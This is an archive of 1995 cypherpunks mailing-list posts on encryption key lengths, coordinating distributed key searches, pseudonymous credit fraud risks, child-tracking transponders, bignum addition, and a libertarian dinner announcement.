> 
> Certainly, for the most paranoid 128 bit IDEA is better than an
> 80 bit RC4.  However, to say that it is unsuitable for anyone is
> a vast stretch.  Considering it probably has a better user-interface
> than SecureDrive, it may be more suitable for the average person.
> 

I am a user of SecureDrive, and strongly support it.   There is *no* 
interface required, once you log into the drive, *everything* operates 
totally transparent to the user.

Always keep in mind that when the gov't doesn't mind the software being 
exported, they alrady know how to compromise it...Trust PGP, Hpack & 
SecureDrive...you won't be disappointed.

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 31 Aug 95 01:26:04 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Citizen-Unit Identification" a Red Herring
In-Reply-To: <ac67e35c0e021004b325@[205.199.118.202]>
Message-ID: <199508310824.SAA17916@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and tcmay@got.net (Timothy C. May)
  and consensus@consensus.com

Well, colour me clueless, but:

tcmay writes:
...
> Citizen-Unit ASCII Name: "Timothy Christopher May"
...
> Known Aliases: "Klaus! von Future Prime," "Lance," "Nick Szabo"
...

So T.C.May is the same person as "Lance"?


The medusa gets bigger every day...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEVxkixV6mvvBgf5AQF3mgP9EDa2O2kIAohjWYJH87F/3zp63rPlsraz
awE3Oabud184C+7oY1pZk1y7KloiXHcYeJNAvoHCBXMWMcFoO9Ds1Ca6iB4F49AX
SJnq+c7IwVae1f/Z58rdaMjXMTweJ3wSrSDZDadyMLHGC6921+z9J8f1pq+wB13c
6CPWlHGCINs=
=pmM9
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Thu, 31 Aug 95 16:32:13 PDT
To: cypherpunks@toad.com
Subject: A problem with anonymity
Message-ID: <9508312332.AA12214@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


I was thinking about some issues related to electronic commerce, and it
occurred to me that there is a significant problem in conducting
business with untraceable pseudonyms (anonyms?).  The problem occurred
to me while considering inheritance.

If one operates a business under an anonym (as opposed to the sort of
conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit
Cards" <URL:ftp://ftp.research.att.com/dist/anoncc/anoncc.ps.Z>),
there's a strategy for transferring unlimited funds to one's
posterity.

Consider a business which typically has a lot of assets, but which are
offset by a lot of liabilities --- almost any sort of VAR will do, for
instance.  In your will, you leave the key to unlock a private message
to your heir, in which you hand over the information necessary to
assume your anonym.  Since the heir presumably has his own identity
(whether anonymous or not is immaterial, except to *his* heirs), and
the anonym can't be linked to you, he has no reason to care about
maintaining the reputation of the anonym.  In dismantling the anonym,
he sells its assets to his own identity at a fraction of their worth,
and defaults on the liabilities.

Since the anonym behaved reputably during its life, it developed what
would have been a credit-worthy reputation, had it been a (traceable)
pseudonym.  But, since there's nothing to link the anonym to its heirs
(or ancestors), the creditors of the anonym must eat the loss.

Since the process of taking an anonym from scratch to a positive
reputation would be reasonably short (presumably not too much longer
than taking a real name or pseudonym the same distance), especially when
helped along by being fed the profits from the legitimate business of
an ancestor anonym, it's likely that a single individual could pull off
such an asset transfer at least two or three times a decade, as well as
at inheritance time.

A market which permits anonyms to have credit based on reputation will
probably have a constant stream of defaults caused by such behavior,
representing a significant risk factor in extending credit to anonyms
which can't be predicted by reputation.

Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 31 Aug 95 01:52:12 PDT
To: tibbs@sina.hpc.uh.edu (Jason L Tibbitts III)
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <9508290348.AA14292@hpc.uh.edu>
Message-ID: <199508310851.SAA17944@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello tibbs@sina.hpc.uh.edu (Jason L Tibbitts III)
  and cypherpunks@toad.com
  and tcmay@got.net (Timothy C. May)

...[about transponders for humans]...
> Believe it or not, something like this is being used (or is being prepared
> for use) in breast implants.  An article in the Houston (silicone city)
...

Is this what they call topic drift?

> Subject: Re: A glance at the future of missing child identification

I can just see the parents getting their young daughters into this system.

Boys, of course, can look after themselves. Sure.
(Or do you envision young boys with breast implants?)


ObCrypto:

So, if they manage to make it more appropriate for both young girls and
for boys, are there any counterarguments? (Not for c'punks, for general
population: "missing children" will be hard to argue against.)

  * privacy (worth a try, anyhow)

  * use of the info by the bad guys (the mythical "pretty girl radar" :-)

  * "witness/victim protection" could be made harder by this

  * alternative: the transponder password could be shared secret between
the parents and the state (what combination here?); protects both against 
perverted state and perverted parents...


OK, what have I missed?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEV3+yxV6mvvBgf5AQEIZAP9HHwlBOjyAjY8v5sQhvHywAXFhiPUuiI2
iPqEyDJ+GB4ZepDJsgzLaroxcEf/Gh72bgi6K8rk3EpqdErDePXa21Egy9Fw9tkm
eFMY+YAOBLUO0C2thprTthVhlY194czoWuqvB2LXKwUyfV5w1CmvK0qQoO5+IVpL
ZUuCIsjKssw=
=qZnM
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 31 Aug 95 02:27:56 PDT
To: sjb@austin.ibm.com (Scott Brickner)
Subject: Re: SSL search attacks
In-Reply-To: <9508300101.AA11637@ozymandias.austin.ibm.com>
Message-ID: <199508310926.TAA18041@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello don@cs.byu.edu
  and cypherpunks@toad.com
  and Scott Brickner <sjb@austin.ibm.com>

Scott wrote:
> don@cs.byu.edu writes
> >From: Scott Brickner <sjb@austin.ibm.com>

...[only server assigns segments, client may ack only assigned segments]...

> >BEAAAT STATE! Push 'em back.. WAAAAAAY BAAAACK. 
> >(relevant comments follow)
> 
...
> *coordinated* attack on the key.  We've established that there is a 1/e
> cost factor in removing the central server.  I just threw out these
...

Wouldn't it be possible to reduce the cost?

Each client could pick a segment at random, check it and then broadcast
a NAK. Other clients would then know that the segment in question has
been done, and avoid picking it in the future. If you are worried about
collisions, one could also have IGRAB, which would advise others that
someone is working on a segment (you can still collide, but not so
often).

One advantage is that it is not necessary to have a central infinitely
trusted server. (Nothing personal, but bogus server is an attack.)

NAKs and IGRABs would be weighted by the trust accorded to the entity
that originated them.

Notes:
  * "broadcast" is probably best done with a fairly sparse graph, otherwise
one will get too much communications.
  * since there is no "server", I should replace "client" with another word.
  * there is no incentive to send NAKs (they diminish your own chance
of hitting the jackpot). How could this be avoided?
  * the NAKs could be sent by e-mail, thus allowing badly connected
and/or anonymous entities to participate.


Am I making any sense at all?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it TOo much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEWAKixV6mvvBgf5AQEnkQQA0/+19hwKS204HjinHiLH5atzrv4CQu4G
Gtpxoq4R+VQgVmsUdYjPsUXce3Cu8KlFuRuJwjhnRuqQxUs53uVkKxo/peoV8xZr
FNguipHzgVu7T9t/hNQwiUDIudkv9mCpP4V27CU31GIt3BpzmfiCJLryFjI0kqKe
PXAB0khlKvY=
=pbWn
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 31 Aug 95 19:24:12 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6bbc24060210043553@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:06 AM 9/1/95, Mac Norton wrote:
>On Thu, 31 Aug 1995, Timothy C. May wrote:
>
>> You don't have to look to death and inheritance for this problem to crop
>> up. Similar situations arise when:
>
>But these are problems of fraud that the criminal and civil
>justice systems already comprehend.  I think what is posited
>is something a bit more unique.

The guy who takes in money and vanishes, or skips to Rio, out of the reach
of extradition treaties, is not all that different from the posited
situation of a nym dematerializing.

The "law" can't really touch either situation, efficiently, and so other
mechanisms are generally used (or recommended, though many con victims have
fail to do so).

I've not claimed the scenarios are identical, only that the issue of agents
taking in money or promising services and then vanishing is as old as
history. That such things will happen with digital pseudonyms is assured.
Fortunately, countermeasures appear practical.

...
>> - this is also a well-known problem with any services that handle money,
>> valuables, etc. For example, the money courier who vanishes to Rio de
>> Janeiro.
>
>I don't think bonding is applicable in this posit, given the
>assumed established creditworthiness of the original anonym.
>Perhaps he originally posted a bond, but the market would
>probably have dispensed with that condition as an unnecessary
>formality at some point in his glowing credit history.
>
>MacN

If the "market" (actually, some players in the market) chose to dispense
with bonding and then got burned, so be it. Later iterations of the market,
and the players, will thus likely _not_ dispense with bonding and other
such measures.

Think of it as evolution in action.

--Tim May

(P.S. Could people try not to include all of the post they are responding
to in their replies?)

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 31 Aug 95 20:44:44 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: SSL search attack
Message-ID: <8B034A5.00030003CF.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


D > >  The odds can be improved somewhat by scaling the granularity of the
D > >sweep to the size of the sweep. (Align larger chunks on large-chunk
D > >boundaries, eliminating the chance of overlap with other large chunks.)
D >
D > Some kind of step (ie, round-down) function performed on the random (I

  More like deciding ahead of time that if you are going to take 1/n of
the keyspace, you should take a chunk aligned on a 1/n boundary. That
way, you don't have two people take chunks right next to each other,
just missing the key, or take chunks that overlap each other massively,
duplicating effort.

  If a random protocol were to be used, each person would roll up an
appropriate starting spot, and then simply search sequentially
thereafter, so that he would not double up on his =own= previous
efforts. The point of scaling the starting point is basically the theory
that says:

     "I will generate a random number of the form xxxxxx0000, because if
     I trust that a person has scanned any given number, I also trust
     that he has scanned the next FFFF keys, so it would be
     counterproductive for me to start anywhere not so aligned."

  And the number of 0s is based on my pathetic amount of computing power
being estimated as 2**(-24) of the total effort. For those who made the
Big Boys list, a few more zeros are in order.

D > is searching an X segment area around where the dart hit. In order to
D > get any kind of boundry, you have to scale the allowed segment blocks, by
D > powers of two, for example, or something, so everyone knows where the
D > borders are. Its a nice thought but I don't see that it's necessary.

  It should improve the odds just a bit. Instead of throwing darts at
2**40 targets, we are only throwing them at 2**24 small ones, and people
with large darts to throw can worry about, say, 2**16 or even 2**12
targets to hit.



 * You always carry weapons, 'cause you always carry cash.
   -Glenn Frey.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Thu, 31 Aug 95 17:21:38 PDT
To: starrd@iia2.org (starrd)
Subject: Re: opinions on RSA Secure?
In-Reply-To: <Pine.BSD.3.91.950831154639.27318A-100000@usr4.primenet.com>
Message-ID: <95Aug31.202112edt.1621@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> The fact that the key is only 80 is *major* compromise.  I would 
> recommend that package to no-one.   With only a 80 bit key you dont 
> *need* trapdoors, granted they may be more "convienient" but the fact is 
> the 80 key *can* [and certainly will] be broken...
I disagree.  If we assume that RC4 and DES can be run at the same speed
(I don't know how true this is) then 80 bit RC4 is 2^24 times harder
to break than DES.  That's 16 million.  A machine that will crack
DES in one day is of the order of one million dollars.  It would take
50,000 years to crack 80-bit RC4.  Alternativly, a one-day crack
would cost 16 trillion dollars.  I feel safe with those numbers.

Certainly, for the most paranoid 128 bit IDEA is better than an
80 bit RC4.  However, to say that it is unsuitable for anyone is
a vast stretch.  Considering it probably has a better user-interface
than SecureDrive, it may be more suitable for the average person.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Thu, 31 Aug 95 18:58:29 PDT
To: Scott Brickner <sjb@austin.ibm.com>
Subject: Re: A problem with anonymity
In-Reply-To: <9508312332.AA12214@ozymandias.austin.ibm.com>
Message-ID: <Pine.SOL.3.91.950831205514.25138D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


1.  Anonymity raises the price of credit; the market will
	decide, probably variously, how that increase will
	be distributed among borrowers.

2.  I suspect the taxation authorities would have an interest
	and that it would be counter-anonymity, producing
	friction that would further increase the above cost.

MacN

On Thu, 31 Aug 1995, Scott Brickner wrote:

> I was thinking about some issues related to electronic commerce, and it
> occurred to me that there is a significant problem in conducting
> business with untraceable pseudonyms (anonyms?).  The problem occurred
> to me while considering inheritance.
> 
> If one operates a business under an anonym (as opposed to the sort of
> conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit
> Cards" <URL:ftp://ftp.research.att.com/dist/anoncc/anoncc.ps.Z>),
> there's a strategy for transferring unlimited funds to one's
> posterity.
> 
> Consider a business which typically has a lot of assets, but which are
> offset by a lot of liabilities --- almost any sort of VAR will do, for
> instance.  In your will, you leave the key to unlock a private message
> to your heir, in which you hand over the information necessary to
> assume your anonym.  Since the heir presumably has his own identity
> (whether anonymous or not is immaterial, except to *his* heirs), and
> the anonym can't be linked to you, he has no reason to care about
> maintaining the reputation of the anonym.  In dismantling the anonym,
> he sells its assets to his own identity at a fraction of their worth,
> and defaults on the liabilities.
> 
> Since the anonym behaved reputably during its life, it developed what
> would have been a credit-worthy reputation, had it been a (traceable)
> pseudonym.  But, since there's nothing to link the anonym to its heirs
> (or ancestors), the creditors of the anonym must eat the loss.
> 
> Since the process of taking an anonym from scratch to a positive
> reputation would be reasonably short (presumably not too much longer
> than taking a real name or pseudonym the same distance), especially when
> helped along by being fed the profits from the legitimate business of
> an ancestor anonym, it's likely that a single individual could pull off
> such an asset transfer at least two or three times a decade, as well as
> at inheritance time.
> 
> A market which permits anonyms to have credit based on reputation will
> probably have a constant stream of defaults caused by such behavior,
> representing a significant risk factor in extending credit to anonyms
> which can't be predicted by reputation.
> 
> Comments?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Thu, 31 Aug 95 19:06:18 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: A problem with anonymity
In-Reply-To: <ac6b9e29040210042a10@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.950831210010.25138E-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 31 Aug 1995, Timothy C. May wrote:

> You don't have to look to death and inheritance for this problem to crop
> up. Similar situations arise when:

But these are problems of fraud that the criminal and civil
justice systems already comprehend.  I think what is posited
is something a bit more unique.

> 
> - a pseudonym simply decides to dissolve the current pseudonym and shift
> focus to another pseudonym (perhaps transferring a bunch of assets, then
> simply vanishing and leaving "no forwarding address')
> 
> (This is of course the basis of any number of scams and "boiler room
> operations." Crypto does not completey eliminate scams like this, and, in
> fact, generates some new kinds of scams.)
> 
> - this is also a well-known problem with any services that handle money,
> valuables, etc. For example, the money courier who vanishes to Rio de
> Janeiro.

I don't think bonding is applicable in this posit, given the 
assumed established creditworthiness of the original anonym.
Perhaps he originally posted a bond, but the market would 
probably have dispensed with that condition as an unnecessary
formality at some point in his glowing credit history.

MacN
> 
> This is one thing that _bonding_ is designed to partially ameliorate. One
> posts a bond which is greater than the amount being carried, or at least is
> some large amount. (Calculations are complex, and various agencies may have
> various policies, depending on other reputation factors.)
> 
> 
> >Since the anonym behaved reputably during its life, it developed what
> >would have been a credit-worthy reputation, had it been a (traceable)
> >pseudonym.  But, since there's nothing to link the anonym to its heirs
> >(or ancestors), the creditors of the anonym must eat the loss.
> 
> The concept of "reputation capital" is a critical one.
> 
> ideally, one never "trusts" an agent with a transaction greater than the
> value of the reputation capital he will lose if he defaults.
> 
> There are still scams and manouvers to thwart this reputation capital
> scheme. The agent planning to "defect" (default, split, abscond, renege,
> etc.) can try to pile up as many pending transactions as possible,
> anticipating that the various transactees will be unaware of each other.
> (This of course happens in real life.)
> 
> Whether cryptographic protocols (cf. the "encrypted open books" proposal by
> eric Hughes for one approach which may be useful) solve this problem is not
> known at this time. But the non-crypto world has of course not solved this
> problem, either.
> 
> ...
> >A market which permits anonyms to have credit based on reputation will
> >probably have a constant stream of defaults caused by such behavior,
> >representing a significant risk factor in extending credit to anonyms
> >which can't be predicted by reputation.
> >
> >Comments?
> 
> Lots of issues need to be thought about. My hunch is that economists, game
> theorists, and scam artists will all discover digital money and pseudonyms
> and will explore various aspects of this situation.
> 
> I devoted a pretty big chunk of my Cyphernomicon to these "darker sides" of
> anonymity, of reputation capital, and suchlike. By no means did I cover all
> the issues of "crypto anarchy," but I suggest interested folks take a look
> at the chapter on crypto anarchy for more discussion.
> 
> --Tim May
> 
> 
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: will@thinkmedia.com (thinkmedia.com)
Date: Thu, 31 Aug 95 22:27:17 PDT
To: cypherpunks@toad.com
Subject: cypherpunks lite?
Message-ID: <199509010527.WAA12666@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


Can someone provide me with the address of cypherpunks lite?

Thanks.

-Will S. Johnston
______________________________________________________________________________
Opinion is a flitting thing,                         Real Time Media
But Truth, outlasts the Sun--                        Thinking Media Research
If then we cannot own them both--                    will@thinkmedia.com
Possess the oldest one--                             (408) 423-3720
             -Emily Dickinson                        http://www.thinkmedia.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Thu, 31 Aug 95 20:20:28 PDT
To: scmayo@rschp1.anu.edu.au (Sherry Mayo)
Subject: Re: sums with BIG numbers
In-Reply-To: <9509010227.AA28294@toad.com>
Message-ID: <199509010320.XAA07735@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Can anyone point me to any books, documentation or
> whatever that will explain the methods used in routines
> like bignum for doing sums with 'too-big' numbers.
> 
> I'm having a tough time trying to figure it out from the code 
> ;-(
> 
> Sherry
> 
What do you mean? How big numbers are added (trivially easier than multiplication
or division) or how it handles numbers that are too large for the variable's
size?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 31 Aug 95 20:28:32 PDT
To: scmayo@rschp1.anu.edu.au (Sherry Mayo)
Subject: Re: sums with BIG numbers
In-Reply-To: <9509010227.AA28294@toad.com>
Message-ID: <199509010327.XAA25211@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Can anyone point me to any books, documentation or
> whatever that will explain the methods used in routines
> like bignum for doing sums with 'too-big' numbers.


Try Knuth's The Art of Computer Programming, Volume 2, Seminumerical 
Algorithms.

Most bignum routines work like this. An integer is represented
as a polynomial p(x) with coefficients a_0, a_1, ..., a_n, where
x is the radix or "base" of the number. The coefficients come from
the ring of integers, modulo the base. For instance, if you are
using base-2 (x=2), the number 28 could be represented as
p(x) = a_4 x^4 + a_3 + x^3 + a_2 x^2 + a_1 x + a_0 

where a_4=a_3=a_2=1 and a_1=a_0=0.  Each a_n is an element of Z mod x

To add two bignums, P(x) and Q(x) simply sum coefficients of like
terms like you would with any polynomial addition, with one simple
modification. If a_k is the coefficient of the x^k term of P(x), and
b_k is the coefficient of the x^k term of Q(x), then the
x^k term of P(x)+Q(x) is a_k+b_k+(carry of previous term) mod x.
(new carry=(a_k+b_k + previous carry)/x)
All this says is, the new term is the sum of the coefficients 
on the x^k terms, modulo x (because your coefficients can not hold
numbers larger than 'x'), plus the carry of the last term. The
carry is 1 if a_k+b_k+previous_carry > x. 

Now you may ask, if our coefficients in our bignum are stored as
32-bit integers, how do I compute the result in C and take into
account overflow?

Well, add the two numbers together. If the result is less than either
of the numbers, an overflow has occured and you must carry (the
machine register has 'rolled over'). For multiplication, you can
either break a 32-bit number into 2 16-bit chunks and perform 4 16-bit
multiplies to get a 64-bit result (using 16x16->32 bit hardware
multiplication) or you can use a number of type "long long int" in C
and let the compiler do it for you.


A short example: let X=123 and Y=789 be bignums represented via the
polynomials P(x)=1 x^2 + 2 x + 3 and Q(x)=7 x^2 + 8 x + 9  with
x=10. let r_n be the coefficients of the resultant polynomial 
R(x)=P(x)+Q(x)

Start at the least significant term. Carry=0
Now r_0=(a_0 + b_0)+carry mod x, or r_0=9+3 mod 10=2, carry=(9+3)/10=1
    r_1=8 + 2 + carry = 11 mod 10 = 1    carry=11/10 = 1 
    r_2=1+7 + carry = 9  carry = 9 / 10 = 0
    
So the result is 912.
  
Explicit modulos are only required if you are working in some base
other then the machine's natural word size. (otherwise the
'roll over' effect gives you the mod for free)

If you are seeking the fastest practical methods of doing multiplication,
division, and modular exponentiation, look up information on 
Karatsuba multiplication, fast reciprocals via Newton's Method,
and Fast Integer Squaring combined with exponent shifting.
(if you are looking at PGP's source code, PGP does not use the
fastest algorithms)

-Ray




  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Thu, 31 Aug 95 20:27:48 PDT
To: sinclai@ecf.toronto.edu (SINCLAIR  DOUGLAS N)
Subject: Re: opinions on RSA Secure?
In-Reply-To: <95Aug31.202112edt.1621@cannon.ecf.toronto.edu>
Message-ID: <199509010328.XAA07922@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


[..]
> 
> Certainly, for the most paranoid 128 bit IDEA is better than an
> 80 bit RC4.  However, to say that it is unsuitable for anyone is
> a vast stretch.  Considering it probably has a better user-interface
> than SecureDrive, it may be more suitable for the average person.
> 
So why not a user-friendly Windows or GUI interface for SecureDrive as well?

How hard is it to adapt LOGIN for Windows?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sjb@austin.ibm.com (Sjb@austin.ibm.com)
Date: Wed, 20 Sep 95 16:29:25 PDT
To: cypherpunks@toad.com
Subject: A problem with anonymity
Message-ID: <9509201546465435@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 31 Aug 1995 18:32:01 -0500
From: Scott Brickner <sjb@austin.ibm.com>

I was thinking about some issues related to electronic commerce, and it
occurred to me that there is a significant problem in conducting
business with untraceable pseudonyms (anonyms?).  The problem occurred
to me while considering inheritance.

If one operates a business under an anonym (as opposed to the sort of
conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit
Cards" <URL:ftp://ftp.research.att.com/dist/anoncc/anoncc.ps.Z>),
there's a strategy for transferring unlimited funds to one's
posterity.

Consider a business which typically has a lot of assets, but which are
offset by a lot of liabilities --- almost any sort of VAR will do, for
instance.  In your will, you leave the key to unlock a private message
to your heir, in which you hand over the information necessary to
assume your anonym.  Since the heir presumably has his own identity
(whether anonymous or not is immaterial, except to *his* heirs), and
the anonym can't be linked to you, he has no reason to care about
maintaining the reputation of the anonym.  In dismantling the anonym,
he sells its assets to his own identity at a fraction of their worth,
and defaults on the liabilities.

Since the anonym behaved reputably during its life, it developed what
would have been a credit-worthy reputation, had it been a (traceable)
pseudonym.  But, since there's nothing to link the anonym to its heirs
(or ancestors), the creditors of the anonym must eat the loss.

Since the process of taking an anonym from scratch to a positive
reputation would be reasonably short (presumably not too much longer
than taking a real name or pseudonym the same distance), especially when
helped along by being fed the profits from the legitimate business of
an ancestor anonym, it's likely that a single individual could pull off
such an asset transfer at least two or three times a decade, as well as
at inheritance time.

A market which permits anonyms to have credit based on reputation will
probably have a constant stream of defaults caused by such behavior,
representing a significant risk factor in extending credit to anonyms
which can't be predicted by reputation.

Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Thu, 31 Aug 95 20:31:14 PDT
To: cypherpunks@toad.com
Subject: LuRaSHA vaporware...
Message-ID: <199509010332.XAA08009@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



The encrypted filesystem I promised never came through, partly because I've
been busy but also because I'm toying with writing it for OS/2 instead... 
alas I know little about OS/2.

Either way, the encryption/decryption routines are nicely written, and I am
willing to make them available for perusal either way (their written in 386
Assembler code).

Drop me a note if you're interested.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Fri, 1 Sep 95 00:11:55 PDT
To: "cypherpunks@toad.com>
Subject: Karl Hess meeting - L.A. area
Message-ID: <199509010711.AAA09927@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

"Extremism in the defense of liberty is no vice, and let me  
remind you, moderation in the pursuit of justice is no virtue." 
 -- Aristotle, and a Goldwater speechwriter, but not Karl Hess. 
Politically Barry's Boy, Karl was often credited with Goldwater's 
most famous line, but he denied it when interviewed. Karl did write  
books: Dear America, Community Technology, and Capitalism For Kids. 
 
     ---  T H E   K A R L   H E S S   C L U B  --- 
now in its second year of almost monthly dinners, presents 

The Perestroika Deception: The Phony "Collapse" of Communism

September's speaker is William (Bill) McIlhany, who will speak on  
Conspiracy Theory of the Soviet collapse, and may answer some 
questions about the Chemical Bank Takeover of Chase Manhattan,
if we ask real nice. 

The Karl Hess Club will meet Monday, September 18 at the Marie 
Callendar Restaurant in Marina Del Rey 4356 Lincoln Boulevard 
(at the 90 Fwy). 

The program is free of charge, but if you care to dine, $13.00 
covers everything including tax and tip, with the exception of 
alcoholic beverages.

Cocktails at 7pm, Dinner at 7:30pm, Speaker at 8:30pm. 
Dinner: $13.00 includes all you can eat buffet with Marie's 
Pot Roast. Vegetable, Salad Bar, Potato, Cornbread, Apple, Lemon 
and Pumpkin Pies plus (Soft) beverages included. Order alcoholic 
beverages on your own, cash & carry. 
 
No reservations are necessary, but for more information, you are 
welcome to contact Mike Everling at (213) 225-3405. 
 
In order to get to the restaurant, take the Marina (90) Freeway 
West until it ends at Lincoln Boulevard. Turn right at Lincoln 
and right again into the parking lot of the restaurant- it's 
just at the corner. Inside the restaurant, go upstairs to the 
meeting room.  
 
The program for October 16 is still in development. The venue 
will again be Marie Callendar in MDR, with the tentatively 
scheduled speaker to be Dr. John Hospers. 
 
Want to make sure you are on the Karl Hess Club mailing list? 
Leave a message at (310) 289-4126, e-mail at agorist003@aol.com, 
or write The Agorist Institute, 291 S. La Cienega Blvd., #749, 
Beverly Hills, CA 90211. 

Browse our Web page -- http://www.pinsight.com/~zeus/agorist/
For tax deduction, make donations payable to The Agorist Institute.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEYh6zTxxI221vktAQFYDwP/chaMpCMb8kxpg2oo/AOi+ybiZFe5KQCY
dJa8LKskqz6usBCuClhWfhvsyfwt5LOg3v9B8yRLiQR8kjHuUWNjkxY8WwsRUi3C
